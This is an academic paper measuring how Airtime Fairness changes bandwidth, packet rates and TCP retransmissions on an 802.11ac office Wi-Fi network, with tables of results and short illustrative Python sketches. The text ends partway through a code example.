Abstract. With the simultaneous operation of two or more wireless users that differ in speed performance, the phenomenon of air monopolization appears, which reflects the imperfection of the built-in mechanisms of the IEEE 802.11 standard for distributing airtime. The influence of Airtime Fairness technology on the performance and quality of an IEEE 802.11ac Wi-Fi wireless network is investigated. The features of implementing the Airtime Fairness algorithms are considered, and a theoretical substantiation of the efficiency of this technology is presented. Statistical data were obtained with a view to optimizing the process of data transmission over the air. Network performance indicators were collected and analyzed when activating the Airtime Fairness mechanisms, with all preliminary settings, equipment locations, and the locations and number of wireless users preserved. An analysis of the main indicators of wireless network performance and quality is presented: the average traffic speed, packet performance, and the number of TCP packets that were lost, damaged, or retransmitted in the network. It was revealed that network performance indicators under Airtime Fairness can vary depending on the equipment manufacturer and the operating mechanisms the manufacturer uses. It is shown that the use of Airtime Fairness technology is advisable, but only with a full understanding of its mechanisms and features, together with a clear understanding of the impact of this technology on the network and on each individual user.

Keywords: Wireless Network · Airtime Fairness · Access · Wi-Fi Technology
1 Introduction

Most commercial organizations implement high-speed wireless networks due to their mobility and ease of deployment. The advantages of Wi-Fi wireless technologies include the ease of deploying and dismantling the network. An important point is the ability to easily connect subscriber devices
to the network while ensuring the security of data transmission and without restricting the user's movement within the network coverage area.

The main disadvantages of wireless systems are the following: problems associated with signal propagation, unstable and non-linear attenuation, interference, noise, and power and bandwidth limitations. These problems are successfully overcome by hardware and software. However, beyond the obvious benefits of portability and freedom from wires, there are less obvious problems. A number of issues should be highlighted regarding the imperfection of the technologies themselves, the large number of various devices, and devices of different generations on the air that are only partially compatible, etc.

Despite its key features and advantages, the Wi-Fi family of technologies has several significant operational disadvantages that are critical under certain conditions. These shortcomings can be caused both by the physical features of the air interface and by the imperfection of IEEE 802.11 technology.

The paper investigates the impact of Airtime Fairness technology, whose mechanisms are aimed at solving one of the problems critical to wireless network performance: the monopolization of airtime by slow-speed users. To this end, the influence of this technology on performance indicators is shown using the example of a wireless network of the IEEE 802.11ac standard – the most modern and widespread standard among office user devices.

The phenomenon of air monopolization with the simultaneous operation of two or more wireless users that differ strongly in their on-air speed indicators is associated with the imperfection of the built-in mechanisms for distributing airtime in the standard. The IEEE 802.11ac standard was not designed to cope with highly differentiated user devices. The CSMA/CA access distribution mechanism incorporated in the technology is based on the principle of dividing access to the air by the amount of transmitted data. Provided that subscriber devices operate at approximately similar speeds, the distribution of airtime can be considered fair. However, when a device connects to the network at a very low speed, unlike the other devices, the slow device monopolizes airtime, reducing both the bandwidth of individual devices and that of the network in general.

Based on theoretical considerations, the mechanisms of Airtime Fairness technology can reduce the impact of a slow-speed user on the overall performance of a wireless network. To verify this, we studied the influence of Airtime Fairness technology on the performance and efficiency of the network, namely on packet performance, delay, and QoS indicators, using the example of a corporate distributed network with the simultaneous operation of both fixed and mobile wireless devices.

1.1 Rationale of Airtime Fairness for IEEE 802.11 Multispeed Networks

A characteristic feature of wireless communication with multiple end devices is sharing the same bandwidth for independent transmission of information. The only method for dividing information flows is time division; that is, independent data transmission by each of the users operating on a common frequency is possible only when transmitting data in turn, provided the air is free.
Given that the states of channels and nodes in a wireless network may differ, a Wi-Fi network operates at several possible data transfer rates. It is well known that the use of multiple data rates provides individual fairness; however, this causes anomalies in Wi-Fi performance, where the performance of a node using a higher data rate can be reduced to that of another node using a lower data rate. In addition, we should take into account that devices of different generations, having different signal-to-noise ratios, using different modulation, coding, etc., and thus operating at their own channel rates, will request airtime in a way that cannot be predicted or forecast in advance. Therefore, a situation is created in which devices with different channel rates apply for airtime simultaneously. The 802.11ac standard grants users access to the network based on the amount of information sent, which creates the problem of airtime monopolization by users with slower speeds. According to the standard, the amount of information transmitted by each user is the same. Thus, the problem arises of the equality of data transmission rates for all network users regardless of their channel speed (Fig. 1).
Fig. 1. Diagram of the airtime distribution between users
Airtime fairness, or time-based fairness, is well known as a method of addressing Wi-Fi performance anomalies and balancing spectrum efficiency in multispeed wireless networks. The tasks of increasing efficiency and allocating channel resources equally between competing nodes are solved at different levels. In [1], it is proposed to use additional extensions to the CSMA/ECA mechanism, Hysteresis and Fair Share, which provide support for a large number of users in order to reduce collisions. To some extent, these algorithms can improve system bandwidth and the short-term fair use of the channel. In [2], the authors discuss Media Access Control (MAC) design issues related to the fact that high collision rates are often caused by the Binary Exponential Backoff (BEB) mechanism in the outdated IEEE 802.11 standards, and the common channel can be overused by nodes with a low bit rate. In high-density scenarios, it is proposed to use differential reservation algorithms (DR and GDR) to reduce collisions between competing nodes by setting the backoff counter to a deterministic value after a successful channel access. In [3], the authors implement a portable airtime scheduler that works on any Linux-based Wi-Fi device. A similar solution [4] reduces the waiting time under load by an order of magnitude, significantly increases the bandwidth of multiple stations, and almost perfectly balances the airtime for both TCP and UDP downlink traffic. A queuing scheme has been developed that eliminates excess buffer capacity in a wireless network.
The practical assessment method proposed in [5] allows indirect assessment of airtime fairness by measuring bandwidth. The concept of responsible airtime is introduced, which covers more than just the data transmission time of the TCP ACK segment in TCP traffic. In [6], a distributed algorithm for airtime allocation, based on the idea of decomposition, is proposed for users of mobile social networks (MSN). The aim of this algorithm is to select a user with a large energy budget, low sensitivity to energy consumption, and a high propagation rate, located in the center of the group. To model this problem, a game-theoretic approach is considered and the Nash bargaining problem is formulated.

1.2 Mechanism for Extended Distributed Channel Access

For a deeper understanding of the principles behind fair air access mechanisms, it is better to give a detailed consideration of the existing and available mechanisms for optimizing the use of the air by disparate user devices. Let us consider one of the access control implementations in the IEEE 802.11 MAC layer standard [7].

A feature of the MAC layer of the IEEE 802.11 standard is the CSMA/CA mechanism and its most important RTS/CTS algorithm, which provides the possibility of alternating data transmission. This carrier sense multiple access mechanism provides random sequential data transmission in a wireless network. A significant drawback of the 802.11 standard is the lack of prioritized media access mechanisms; that is, the initial specification of the standard was not designed to meet QoS requirements. All users of the wireless network had equal rights both to access the air and to use airtime.

The algorithm of the CSMA/CA mechanism can be represented as follows. Any device, before transmission, listens to the air to check for interference in the form of information transmission by another device. If the air is free for a certain time, the user starts the data exchange. All other devices operating in the network wait for the current transfer to complete, pause, and then, provided the air is free, start their data transfer. Peer devices, given free air, have equal rights and an equal probability of starting data transmission next, but there is still a possibility of collision when two devices start transmitting simultaneously.

The Enhanced Distributed Channel Access (EDCA) mechanism [8, 9] was introduced as an addition in the IEEE 802.11e standard. The EDCA mechanism adheres to the principle of "intrusive courtesy", but introduces controlled unfairness in order to provide preferential access to the air for certain priority traffic types. In practice, this is expressed as a mandatory minimum waiting time before the start of transmission, with a smaller set of random transmission delay values for some types of traffic. Using the value of the ToS or DSCP field, the EDCA engine categorizes all existing traffic into several basic types. Thus, traffic classified as voice has a lower delay before transmission than traffic classified as video, which in turn waits less time than traffic classified as "best effort", which in turn waits less time than traffic classified as "other". Some types of traffic are therefore prioritized because they receive permission to start transmission earlier; all other devices or lower-priority traffic have to wait for the end of transmission of higher-priority traffic.
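The following toy Python sketch imitates EDCA-style prioritized contention: each access category waits a fixed minimum number of idle slots (an AIFS-like value) plus a random backoff drawn from its contention window, so higher-priority traffic tends to win access. The slot counts are illustrative and do not reproduce the exact 802.11e AIFS/CW parameters.

```python
import random

# Illustrative per-category parameters (not the exact 802.11e values):
# a smaller fixed wait and contention window means earlier expected access.
ACCESS_CATEGORIES = {
    "voice":       {"aifs": 2, "cw": 7},
    "video":       {"aifs": 2, "cw": 15},
    "best_effort": {"aifs": 3, "cw": 63},
    "background":  {"aifs": 7, "cw": 127},
}

def contention_wait(category: str) -> int:
    """Idle slots a station waits before transmitting once the medium is free."""
    ac = ACCESS_CATEGORIES[category]
    return ac["aifs"] + random.randint(0, ac["cw"])

# The category with the smallest wait seizes the channel in this round.
waits = {cat: contention_wait(cat) for cat in ACCESS_CATEGORIES}
print("winner:", min(waits, key=waits.get), waits)
```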
This method is more likely to meet QoS requirements, but it does not solve the problem of devices differentiated by channel rate at all.

1.3 Theoretical Basics of Airtime Fairness Technology

The Airtime Fairness algorithms are based on TDMA – Time Division Multiple Access. The principle of the technology lies in the cyclical division of airtime between users, either into equal or into specified periods of time. This approach solves the issue of excessive use of airtime for the transmission of a relatively small amount of data by users that, for whatever reason, operate at a much lower channel speed than other network users. Thus, Airtime Fairness is a technology for ensuring fair access to the air based on the principle of equal on-air time for each network user, regardless of channel speed (Fig. 2).
Fig. 2. Diagram of airtime distribution when using the Airtime Fairness technology
Depending on the equipment manufacturer, and hence on the specific implementation of the technology, the algorithm for dividing airtime between users may differ. There are two main types of airtime division: into equal periods of time, regardless of the user's parameters, and into arbitrary periods of time, depending on the administrative settings of the system.

It is known that slower devices take relatively longer to send and receive data compared to newer and faster devices. The implication of this is that less airtime remains for faster devices, while slower devices disproportionately monopolize the air. As indicated above, one of the reasons for this behavior is a significant distance between the access point and one or more user devices. Another reason can be outdated equipment that does not support high-speed transmission modes.

For example, let us analyze the time spent on the air by users with different speeds and MCS indices [10–12]. To transfer one Mbyte of information, a user operating at a speed of 400 Mbps will take significantly less time than a user operating at a speed of 54 Mbps, as shown by Formulas (1) and (2):

$$t_{tr\,MCS9} = \frac{1\,\text{Mbyte} \cdot 8}{400\,\text{Mbps}} = \frac{8\,\text{Mbit}}{400\,\text{Mbps}} = 0.02\,\text{s} \quad (1)$$

$$t_{tr\,MCS2} = \frac{1\,\text{Mbyte} \cdot 8}{54\,\text{Mbps}} = \frac{8\,\text{Mbit}}{54\,\text{Mbps}} = 0.148\,\text{s} \quad (2)$$
Thus, a situation arises on the air in which, with an equal volume of transmitted data, the remote user occupies 88% of the airtime (Formula (3)):

$$\Delta t = \frac{t_{tr\,MCS2}}{t_{tr\,MCS2} + t_{tr\,MCS9}} \cdot 100\% = \frac{0.148}{0.148 + 0.02} \cdot 100\% = 88\% \quad (3)$$

and the average bandwidth of the access point is 11.9 Mbps (Formula (4)):

$$C = \frac{1}{t_{tr\,MCS2} + t_{tr\,MCS9}} \cdot 2\,\text{Mbit} = 11.9\,\text{Mbps} \quad (4)$$
Unlike the 802.11ac standard, Airtime Fairness technology provides all user devices with equal access to the air in terms of time. That is, users of an access point with the technology enabled get equal airtime for data transmission. Using the example above, let us calculate the average performance of the access point if each subscriber is given 0.5 s for data transmission. Formula (5) shows the amount of data transferred per second of airtime for the high-speed user, and Formula (6) for the slow-speed user:

$$C_{1C} = \frac{0.5\,\text{s}}{t_{tr\,MCS9}} \cdot 1\,\text{Mbps} = \frac{0.5\,\text{s}}{0.02\,\text{s}} \cdot 1\,\text{Mbps} = 250\,\text{Mbps} \quad (5)$$

$$C_{2C} = \frac{0.5\,\text{s}}{t_{tr\,MCS2}} \cdot 1\,\text{Mbps} = \frac{0.5\,\text{s}}{0.148\,\text{s}} \cdot 1\,\text{Mbps} = 3.38\,\text{Mbps} \quad (6)$$
Based on Formulas (5) and (6), it can be seen that when using the method of fair access to the air based on time rather than on the amount of transmitted data, the average bandwidth of the access point is 253.38 Mbps. This is over 21 times more than with the fair access method based on the amount of data transferred. It should be noted that when using Airtime Fairness, although the average air bandwidth increases, a slower-speed user loses significant bandwidth. In addition, delays increase, and QoS requirements become nearly impossible to meet. This is the key disadvantage of the technology.

1.4 Conditions for Selecting the IEEE 802.11ac Standard

The selection of the IEEE 802.11ac standard for this research is conditioned by several reasons. The 5 GHz band, in contrast to the 2.4 GHz band, is maximally conducive to building high-speed wireless networks that are stable over time and predictable in terms of quality parameters. It offers a much larger spectrum bandwidth for IEEE 802.11 networks and a sufficient number of non-overlapping channels, which allows a greater distance between access points operating on the same frequency channel and makes it possible to build a better frequency plan [13]. In high-density environments, 5 GHz radio modules can be physically collocated to increase network capacity across multiple channels. This range is also relatively free of interference, which increases the stability and speed of the connection. In addition, the 802.11ac standard optionally supports Beamforming technology, which addresses the drop in signal power caused by reflections from various objects and surfaces [14]. Among the standards that support operation in the 5 GHz range, 802.11ac was selected due to the following factors: a large number of compatible user devices at
the same time; availability; flexibility compared with Wi-Fi 6, 802.11n, and earlier technologies; support for extreme channel speeds; and support for additional technologies, such as MU-MIMO, aimed at improving existing performance indicators. Figure 3 shows the increase in the channel speed of the 802.11ac standard in comparison with its predecessors [15].
Fig. 3. Comparison of channel rates of IEEE 802.11 standards
1.5 Features of Implementing Airtime Fairness Technology on Edimax Equipment

Although the Airtime Fairness technology is implemented in software, the choice of specific equipment based on technical characteristics is not of decisive importance for this study. The choice of vendor for creating the conditions and carrying out the experiment is also not essential, since results obtained under the same conditions and with similar settings, but using similar equipment from another vendor, will differ due to the lack of uniform standardization. The choice of equipment for the study is based on the following conditions: the required number of access points and the possibility of loading them with a significant number of users that move in space, moving away from and approaching the access point, which allows monitoring the state of the network and the value of the current average bandwidth over an arbitrary time interval. This, in turn, guarantees the maximum reliability of the data obtained, even if the study is carried out over several days. The study used Edimax equipment with business-segment CAP1300 access points. The implementation of Airtime Fairness technology in the CAP1300 access points has the following characteristics:

– Data received from the radio module after scanning airtime usage is stored in memory and processed over several tens or hundreds of data transmission sessions. This allows a user to move quickly away from the access point, reducing their channel speed, while the allocated transmission bandwidth decreases gradually, which in turn minimizes the probability of queue congestion on the user interface and minimizes the number of dropped packets;
642
L. Tokar and Y. Krasnozheniuk
– Scanning of the current situation on the air is performed at discrete intervals, which somewhat reduces the efficiency of the equipment, but significantly saves the computing resources of the central processor; – The access point performs control of the air utilization in the forward and backward directions. Since the wireless user does not participate in the process of allocating time slots and changing their size, the access point has the ability to control the transmission time in both directions; – To track time and ensure maximum efficiency at the access point, the use of the token method is provided [16]; – The packet receives permission to transfer data in a direct flow from the access point to the user only after confirming the availability of a sufficient number of virtual tokens; – Airtime Fairness does not analyze data packets at any level. The only packet parameter that the technology algorithm operates on is its size (meaning the packet size at the link layer, i.e. the size of the Ethernet frame). The algorithm for obtaining permission at the beginning of data transmission in a direct flow is as follows: 1. Obtaining and analyzing the current channel speed at which the user is working. 2. Obtaining and analyzing information about the size of the data packet being prepared for sending. 3. Calculation of the required time to transmit a packet at a known size and the user’s current channel speed. 4. Comparison of the time required to transmit a frame and the available number of temporary tokens for the current communication session. If the number of temporary tokens is sufficient to transmit the frame, then the frame is sent to the radio module for transmission to the user. If the number of tokens is insufficient to transfer the current packet, it is delayed in the queue until the next cycle of the algorithm to obtain permission to transfer. Based on the information received, we can conclude that the Airtime Fairness technology on Edimax equipment is implemented taking into account the current parameters of the radio channel and the frame size.
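The admission check in steps 1–4 is essentially a token-bucket test on airtime rather than on bytes. The following minimal Python sketch illustrates the idea; the class, its names and the budget value are illustrative assumptions, not the actual Edimax implementation.

    # A minimal sketch of the token-based airtime admission check
    # described above; all names and values are assumptions.
    class AirtimeTokenBucket:
        def __init__(self, airtime_budget_us: float):
            # Airtime tokens available in the current scheduling cycle,
            # expressed in microseconds of air occupancy.
            self.tokens_us = airtime_budget_us

        def admit(self, frame_size_bytes: int, link_rate_mbps: float) -> bool:
            """Steps 1-4: estimate the airtime a frame would consume at the
            user's current channel rate and compare it with the budget."""
            # Step 3: transmission time in microseconds (bits / Mbps = us).
            airtime_us = (frame_size_bytes * 8) / link_rate_mbps
            # Step 4: admit only if enough tokens remain; otherwise the
            # frame stays queued until the next cycle refills the bucket.
            if airtime_us <= self.tokens_us:
                self.tokens_us -= airtime_us
                return True
            return False

    # Example: a 1500-byte frame costs 12000/867 ≈ 13,8 us for a fast
    # client but 12000/6 = 2000 us for a legacy 6 Mbps client, so the
    # slow client exhausts its airtime budget far sooner.
    bucket = AirtimeTokenBucket(airtime_budget_us=5000)
    print(bucket.admit(1500, 867.0))  # True - cheap in airtime
    print(bucket.admit(1500, 6.0))    # True, but consumes 2000 us at once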
2 Study of the Impact of Airtime Fairness Technology on the Example of a Corporate Network

The main feature of wireless communication is that the transmission medium is deterministic neither in time nor in location. Unlike wired transmission lines, wireless systems are continuously affected by a large number of environmental factors: the distance between the access point and the user equipment, countless signal reflections, internal and external interference, "hidden nodes", etc. The results of the study will not be identical if any of the environmental parameters change. The accuracy of the results can be improved only with the help of statistical methods, such as multiple repetitions of the experiment under the same parameters and environmental conditions.
2.1 Initial Conditions for Conducting Research

The hardware basis for the study was a corporate wireless network for internal use by company employees. Edimax corporate-level CAP1300 access points were used. The access point meets all modern requirements for wireless equipment and supports the IEEE 802.11ac Wave 2 standard, MU-MIMO technology and adaptive beamforming; however, beamforming was disabled to prevent distortion of the collected data by proprietary algorithms. The maximum channel rate supported by the 5 GHz wireless system is 867 Mbps. Wireless network management, including enabling and disabling wireless options, was performed centrally using a wireless controller. It should be noted that logical VLAN separation was used to transmit traffic to the router, so distortion of the experimental data is almost completely excluded. Switching, as well as accounting of the number and size of packets transmitted over the wireless network, was carried out by a stack of Cisco SMB Series SG350X switches.
The study was carried out in an open-space office building containing furnished premises with an area of 80 square meters or more, in which access points were installed mainly close to the centers of the rectangular areas of the rooms. During the study, at least 50 users were simultaneously connected to the Wi-Fi network, distributed evenly throughout the office and loading the network equipment evenly. The most important variable in the network is the users' devices, which consume a random amount of network traffic as they move through the building. This environment was chosen for the research because of free access to the settings of the information system and of all wired and wireless office equipment.
A feature of the work is the use of mainly averaged statistical data obtained over a certain period. Research and data collection were conducted during working hours, from 9:00 to 18:00, over several days. In the first three days, control information was collected, i.e. the data used as the baseline in the statistical analysis. In the next three days, information was collected whose analysis determined the impact of Airtime Fairness technology on network performance indicators. It should be noted that during working hours the main share of the network load is generated by terminal-user traffic and HTTPS traffic: site visits, background music, training videos, minor file sharing, etc. The values of the main settings are shown in Table 1.
The methodology for collecting and presenting the results of the control measurements is as follows:
– Statistical data were collected over six days under the same conditions, with unchanged network settings and with the equipment and employees' workplaces in constant locations;
– Since the statistical data for each day are similar and no anomalous data were found, statistics for only three randomly chosen days are presented;
– To improve the accuracy and reliability of the collected data, each day was divided into time intervals of 5, 10, 15 and 30 min and one, two and three hours, and the distribution of the intervals during the day was random.
Table 1. Values of the main parameters of the wireless network

Parameter | Reference week value | Value during the next week
Airtime Fairness enabled | − | +
Maximum channel speed in the 5 GHz range, Mbps | 867 | 867
Real maximum channel throughput for 2x2 MIMO with a signal bandwidth of 40 MHz, Mbps | 400 | 400
Maximum possible data transfer rate over the radio channel for 2x2 MIMO, Mbps | 280 | 280
Maximum possible data transfer rate over the radio channel for 1x2 SIMO, Mbps | 140 | 140
Beamforming enabled | − | −
IEEE 802.11r/k/v protocol family | + | +
Band steering enabled | + | +
Transmitter power, dBm | 17 | 17
– Data collection was carried out in semi-automatic mode using the Zabbix network monitoring software, which polls the network equipment via the SNMP protocol with templates suitable for each type of equipment.
– Data on the size and number of packets was collected from the root router that terminates the wireless network traffic.
– For a better assessment of performance in relation to the type of traffic and, consequently, the packet size, the parameters were differentiated and estimated independently for three packet sizes at the link layer: small (64 to 512 bytes), medium (513 to 1024 bytes) and large (1025 to 1518 bytes).
– Data on the utilization of the wireless channel was obtained by monitoring the internal statistics of each access point.

2.2 Investigation of System Productivity Without Using Airtime Fairness Technology

During the first three days of the study, we collected benchmark network performance statistics with Airtime Fairness turned off in order to analyze the wireless performance metrics. Tables 2, 3 and 4 show the performance indicators and the arithmetic mean values of channel utilization.
Table 2. Performance indicators of the network on day 1

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–9.05 | 103 | 225 | 599 | 927 | 8864,8 | 13,6
9.05–9.15 | 112 | 284 | 713 | 1109 | 10482 | 16,2
9.15–9.30 | 124 | 309 | 744 | 1177 | 11166,6 | 17,51
9.30–10.00 | 131 | 345 | 757 | 1233 | 11586,7 | 18,09
10.00–11.00 | 118 | 317 | 827 | 1262 | 12128,3 | 19,13
11.00–13.00 | 133 | 303 | 750 | 1186 | 11128,3 | 17,45
13.00–16.00 | 136 | 275 | 764 | 1175 | 11642,4 | 18,61
Table 3. Performance indicators of the network on day 2

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–11.00 | 116 | 300 | 780 | 1196 | 11926,4 | 19,26
11.00–11.05 | 119 | 291 | 763 | 1173 | 11575,2 | 18,69
11.05–11.15 | 127 | 320 | 829 | 1246 | 12608 | 20,3
11.15–11.30 | 134 | 296 | 781 | 1228 | 12129,6 | 18,81
11.30–12.00 | 141 | 306 | 827 | 1262 | 12128,3 | 19,13
12.00–13.00 | 124 | 272 | 689 | 1085 | 10700,8 | 16,63
13.00–16.00 | 143 | 331 | 836 | 1310 | 12972 | 19,97
Based on the data obtained as a result of the study, the following conclusions can be drawn:
– System parameters (number of packets, their size, average traffic for the period) are random variables that are weakly correlated. This is caused by many factors: the random amount of traffic generated by each user per unit of time and the random type of traffic at any given moment. In addition, the number of wireless users of the system is variable and unpredictable;
– There is almost no change in the dependences of the average packet performance and average bandwidth for any period. This is due to the inability to predict the type of traffic and, accordingly, the average size of the packets generated by a specific user in the forward and backward directions of data transmission;
– Some correlation should be noted between packet performance and average speed in the period from 12:30 to 14:00 daily, which corresponds to the lunch break in the company. The slight decrease in and fluctuation of the indicators during this period are due to a pause in work processes, accompanied by an increase in user activity on social networks, video hosting, news sites, etc.
Table 4. Performance indicators of the network on day 3

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–10.00 | 118 | 319 | 804 | 1241 | 11788,9 | 18,47
10.00–13.00 | 120 | 283 | 753 | 1156 | 11463,2 | 17,63
13.00–13.05 | 140 | 304 | 665 | 1099 | 10208,1 | 16,03
13.05–13.15 | 138 | 314 | 748 | 1200 | 11179,4 | 17,69
13.15–13.30 | 151 | 294 | 832 | 1277 | 12071,4 | 19,13
13.30–14.00 | 125 | 329 | 712 | 1166 | 10784,8 | 16,74
14.00–16.00 | 143 | 311 | 744 | 1198 | 11725,6 | 18,19
2.3 Investigation of System Productivity Using Airtime Fairness Technology

The collection of statistics during the next three days of the study was carried out using the same methodology as during the first three days. Three random days were selected for data analysis: day 4, day 5 and day 6. The only difference in the system settings is the activation of the Airtime Fairness technology algorithms. The collected data are presented in Tables 5, 6 and 7.

Table 5. Performance indicators of the network using Airtime Fairness technology on day 4

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–10.00 | 122 | 299 | 748 | 1166 | 11096,3 | 14,84
10.00–10.05 | 138 | 309 | 785 | 1232 | 11772,8 | 16,36
10.05–10.15 | 147 | 295 | 823 | 1165 | 12140,8 | 16,86
10.15–10.30 | 130 | 321 | 797 | 1248 | 12036 | 17,21
10.30–11.00 | 137 | 323 | 817 | 1277 | 12473,6 | 17,53
11.00–14.00 | 130 | 283 | 704 | 1117 | 10976 | 14,69
14.00–16.00 | 136 | 332 | 821 | 1289 | 12201 | 16,6
Thus, taking into account that there were no changes in the settings, configuration or location of the wireless equipment during the study, the changes in network performance indicators revealed during the second week are due to the operation of the Airtime Fairness algorithms.
Table 6. Performance indicators of the network using Airtime Fairness technology on day 5

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–11.00 | 142 | 324 | 823 | 1289 | 12259,4 | 16,15
11.00–11.05 | 153 | 377 | 884 | 1414 | 13284 | 18,64
11.05–11.15 | 145 | 366 | 857 | 1368 | 12864,5 | 18,19
11.15–11.30 | 137 | 355 | 842 | 1334 | 12567 | 17,65
11.30–12.00 | 120 | 347 | 810 | 1277 | 12073,6 | 16,54
12.00–13.00 | 114 | 351 | 832 | 1297 | 12391,1 | 16,81
13.00–16.00 | 145 | 353 | 811 | 1309 | 12235,4 | 15,87
Table 7. Performance indicators of the network using Airtime Fairness technology on day 6

Time interval | 64–512 B, pps | 513–1024 B, pps | 1025–1518 B, pps | Total, pps | Traffic, kbps | Channel utilization, %
9.00–11.00 | 132 | 342 | 878 | 1352 | 13376 | 19,12
11.00–14.00 | 128 | 323 | 817 | 1268 | 12548,8 | 16,88
14.00–14.05 | 122 | 289 | 742 | 1153 | 11283,2 | 16,08
14.05–14.15 | 144 | 349 | 791 | 1284 | 11992,9 | 17,21
14.15–14.30 | 137 | 356 | 853 | 1346 | 12766,1 | 18,29
14.30–15.00 | 138 | 320 | 766 | 1224 | 11932,8 | 16,07
15.00–16.00 | 128 | 299 | 759 | 1186 | 11704 | 15,88
There is an increase in packet performance and average transmission rate, and a decrease in the percentage of channel utilization. This indicates a positive change in the performance of the wireless network.
3 Analysis of Network Bandwidth

One of the most important qualitative indicators of transmission system performance, especially with a random method of accessing the medium, is the bandwidth available to user traffic. While Airtime Fairness does not increase the amount of traffic transmitted, bandwidth is an important indicator of the technology's performance. To improve the accuracy of the research results, the average daily bandwidth was compared with the bandwidth over selected shorter periods: one hour per day, divided into periods of 5, 10, 15 and 30 min. Indicators of the traffic transmission speed for each day of the study are shown in Fig. 4.
Fig. 4. Indicators of traffic transmission speed for each day of the study
Based on the methodology for collecting and presenting the results (Sect. 2.1), changes in the wireless performance indicators are analyzed by comparing the indicators obtained after the activation of the Airtime Fairness mechanisms with the indicators obtained during the control week for the corresponding periods of time. The change in the average daily bandwidth of the system for the periods with activated Airtime Fairness, relative to the control measurements of the first week, is given by Formula (7):

Δtr = (C_ATF / C_contr) · 100% − 100,   (7)

where C_ATF is the system bandwidth with activated Airtime Fairness, and C_contr = (C_day1 + C_day2 + C_day3) / 3 is the average system bandwidth during the control period.
The changes in bandwidth with activated Airtime Fairness compared to the control values for the same periods of the control week are shown in Table 8. The analysis results in the graphs in Fig. 5 and in Table 9, which show the average difference in data transfer rates with Airtime Fairness enabled for the studied days. Based on the analysis of the data obtained, we can conclude that network performance increased with the Airtime Fairness algorithms enabled, which is clearly shown in Fig. 5. The average overall bandwidth over the study period increased by 8,78% compared with the data obtained for the control week. However, it should be taken into account that there were no overloads in the network during the study.
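As a quick cross-check, Formula (7) can be applied directly to the average daily traffic values from Table 12; the small deviation from the figures in Table 9 comes from the fact that the paper's values are averaged over matched time periods rather than over whole days.

    # Worked example of Formula (7) using average daily traffic (kbps).
    c_control = (10999.9 + 11919 + 11317.3) / 3   # control-week mean, ≈ 11412,07 kbps
    for day, c_atf in {"Day 4": 11813.8, "Day 5": 12525, "Day 6": 12230}.items():
        delta_tr = c_atf / c_control * 100 - 100
        print(f"{day}: {delta_tr:+.2f}%")
    # Day 4: +3.52%, Day 5: +9.75%, Day 6: +7.17% - close to the average
    # daily values reported in Table 9.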
Table 8. Changes in bandwidth values with activated Airtime Fairness compared to the control values for the same periods of the control week

Day | Control day | Average daily bandwidth | 5 min | 10 min | 15 min | 30 min
Day 4 | Day 1 | +7,4% | +32,8% | +15,8% | +7,8% | +7,7%
Day 4 | Day 2 | −0,9% | +1,7% | −3,7% | +4,5% | +2,8%
Day 4 | Day 3 | +4,4% | +15,3% | +8,6% | −0,3% | +15,7%
Day 5 | Day 1 | +13,9% | +49,9% | +22,7% | +12,5% | +4,2%
Day 5 | Day 2 | +5,1% | +14,8% | +2% | +9,1% | −0,5%
Day 5 | Day 3 | +10,7% | +30,1% | +15,1% | +4,1% | +12%
Day 6 | Day 1 | +11,2% | +27,3% | +14,4% | +14,3% | +3%
Day 6 | Day 2 | +2,6% | −2,5% | −4,9% | +13,5% | −1,6%
Day 6 | Day 3 | +8,1% | +10,5% | +7,3% | +5,8% | +10,6%
Fig. 5. Average difference in data transfer rates with the enabled Airtime Fairness technology for the studied days
4 Analysis of Error Probability in the Transmission of TCP Traffic

A wireless network in operation has a higher probability of errors, both in-channel and inter-channel, than any cable system. To combat interference and collisions in the transmission channel, the CSMA/CA algorithm is used [17, 18]. That is why, in addition to bandwidth, an integral indicator in a comprehensive assessment of a data transmission channel is the probability of errors.
Table 9. Data transfer rates with the enabled Airtime Fairness technology for the studied days

Day | Average daily bandwidth | 5 min | 10 min | 15 min | 30 min
Day 4 | +3,63% | +16,6% | +6,9% | +4% | +8,73%
Day 5 | +9,9% | +31,6% | +13,3% | +9,57% | +5,23%
Day 6 | +7,3% | +11,77% | +5,6% | +11,2% | +4%
Since the monitoring of the network operation was carried out at the link and network layers, it is only possible to estimate a secondary indicator of error occurrence – the proportion of damaged packets. The evaluation of TCP traffic was chosen as an expedient and effective method for assessing the probability of damaged packets, since TCP traffic is the most sensitive to packet loss or damage. The technique for estimating the percentage of damaged TCP segments in the network narrows down to estimating the number of TCP segments retransmitted by the end hosts: a request for, and retransmission of, a TCP segment clearly indicates damage or loss of one or more data packets belonging to TCP traffic. The technical ability to count and estimate the number of lost packets is implemented using a packet counter triggered by the "TCP Dup ACK" and "TCP Retransmission" flags, which indicate the retransmission of data segments. The necessary flags are counted using a TCP traffic sniffer on the root router and a server computer with the Wireshark analyzer installed for inspecting the content and headers of TCP segments. In order to optimize and simplify the analysis, only three time intervals of one hour each were considered for each of the study days. The values of the retransmitted TCP packet counter and of the total TCP packet counter, implemented on the root router, were used. The percentage of TCP packets retransmitted over the wireless network is given by Formula (8):

λ = (N_rep / N_total) · 100%,   (8)

where N_rep is the number of retransmitted TCP packets and N_total is the total number of transmitted TCP packets. The results for the percentage of TCP packets retransmitted over the wireless network are shown in Table 10. Analyzing Table 10, we can conclude that the retransmission percentage does not significantly depend on the load. This is due to the relatively low utilization of the channel, the rational placement of equipment, the almost complete absence of out-of-band interference and, accordingly, the minimum probability of collisions due to hidden-node problems. The number of retransmitted packets during the Airtime Fairness period decreased by 7,77% on average compared to the data obtained in the first benchmark week (Fig. 6, Table 11).
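As an illustration of how the counters behind Formula (8) can be obtained programmatically, the sketch below counts flagged segments in a capture file using pyshark (a Python wrapper around tshark) with the standard Wireshark display filters mentioned above. The file path and the tool choice are assumptions; the study itself used counters on the root router.

    import pyshark  # requires tshark to be installed on the host

    def retransmission_percentage(pcap_path: str) -> float:
        """Estimate lambda from Formula (8) by counting TCP segments that
        Wireshark flags as retransmitted or duplicate-ACKed."""
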